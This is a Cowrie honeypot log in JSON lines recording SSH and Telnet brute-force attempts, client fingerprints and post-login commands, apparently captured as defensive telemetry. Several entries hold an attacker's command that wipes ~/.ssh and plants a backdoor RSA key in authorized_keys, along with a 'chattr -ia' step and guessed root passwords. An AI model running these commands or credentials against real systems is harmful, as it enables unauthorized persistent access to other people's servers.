{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.460566Z","src_ip":"212.227.235.229","session":"b638e339c0e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.626123Z","src_ip":"212.227.235.229","session":"b638e339c0e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:08.791308Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:09.251759Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.252425Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.328452Z","src_ip":"212.227.235.229","session":"b638e339c0e1"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.493685Z","src_ip":"212.227.235.229","session":"1e91392fc353"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.495400Z","src_ip":"212.227.235.229","session":"b638e339c0e1"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.500457Z","src_ip":"212.227.235.229","session":"69333b5b7f24"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.593674Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.594564Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47115,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d06f8123259","protocol":"ssh","message":"New connection: 212.227.235.229:47115 (1.2.3.4:22) [session: 1d06f8123259]","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.928634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:09.929608Z","src_ip":"212.227.235.229","session":"1d06f8123259"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:10.274445Z","src_ip":"212.227.235.229","session":"1d06f8123259"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:10.748544Z","src_ip":"212.227.235.229","session":"69333b5b7f24"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:12.732065Z","src_ip":"212.227.235.229","session":"1d06f8123259"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35961,"dst_ip":"1.2.3.4","dst_port":23,"session":"59e78c907d54","protocol":"telnet","message":"New connection: 212.227.125.160:35961 (1.2.3.4:23) [session: 59e78c907d54]","sensor":"my-vps","timestamp":"2025-09-09T06:23:12.789486Z"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:14.070705Z","src_ip":"212.227.235.229","session":"1d06f8123259"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48205,"dst_ip":"1.2.3.4","dst_port":22,"session":"646e11aa0dff","protocol":"ssh","message":"New connection: 212.227.235.229:48205 (1.2.3.4:22) [session: 646e11aa0dff]","sensor":"my-vps","timestamp":"2025-09-09T06:23:14.416645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:14.417650Z","src_ip":"212.227.235.229","session":"646e11aa0dff"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:14.762910Z","src_ip":"212.227.235.229","session":"646e11aa0dff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"563f72d5ec33","protocol":"ssh","message":"New connection: 212.227.125.160:51824 (1.2.3.4:22) [session: 563f72d5ec33]","sensor":"my-vps","timestamp":"2025-09-09T06:23:15.440703Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:15.511850Z","src_ip":"212.227.125.160","session":"563f72d5ec33"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:16.165845Z","src_ip":"212.227.235.229","session":"646e11aa0dff"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:16.521858Z","src_ip":"212.227.235.229","session":"aac485ba3f87"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:16.524501Z","src_ip":"212.227.235.229","session":"646e11aa0dff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49498,"dst_ip":"1.2.3.4","dst_port":22,"session":"b96a1392cb70","protocol":"ssh","message":"New connection: 212.227.235.229:49498 (1.2.3.4:22) [session: b96a1392cb70]","sensor":"my-vps","timestamp":"2025-09-09T06:23:23.653277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:23.661023Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:23.999660Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.login.success","username":"root","password":"db2admin","message":"login attempt [root/db2admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:23:25.579808Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:26.358240Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:26.359241Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:23:26.360692Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.session.closed","duration":13.874609470367432,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:26.663995Z","src_ip":"212.227.125.160","session":"59e78c907d54"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.118099Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:23:27.572203Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.572895Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50359,"dst_ip":"1.2.3.4","dst_port":22,"session":"901b4860ff66","protocol":"ssh","message":"New connection: 212.227.235.229:50359 (1.2.3.4:22) [session: 901b4860ff66]","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.867571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.868337Z","src_ip":"212.227.235.229","session":"901b4860ff66"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.926624Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.927483Z","src_ip":"212.227.235.229","session":"b96a1392cb70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:23:27.933554Z","src_ip":"212.227.235.229","session":"901b4860ff66"}
{"eventid":"cowrie.login.failed","username":"zhangyaohua","password":"12345","message":"login attempt [zhangyaohua/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:28.236159Z","src_ip":"212.227.235.229","session":"901b4860ff66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50331,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9592824e436","protocol":"ssh","message":"New connection: 212.227.235.229:50331 (1.2.3.4:22) [session: e9592824e436]","sensor":"my-vps","timestamp":"2025-09-09T06:23:28.408149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:28.409957Z","src_ip":"212.227.235.229","session":"e9592824e436"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:29.304609Z","src_ip":"212.227.235.229","session":"901b4860ff66"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:30.364424Z","src_ip":"212.227.235.229","session":"e9592824e436"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:23:33.308483Z","src_ip":"212.227.235.229","session":"e9592824e436"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:23:34.660441Z","src_ip":"212.227.235.229","session":"e9592824e436"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51703,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d3d4e371723","protocol":"ssh","message":"New connection: 212.227.235.229:51703 (1.2.3.4:22) [session: 9d3d4e371723]","sensor":"my-vps","timestamp":"2025-09-09T06:23:35.081372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:23:35.087190Z","src_ip":"212.227.235.229","session":"9d3d4e371723"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:23:35.509187Z","src_ip":"212.227.235.229","session":"9d3d4e371723"}
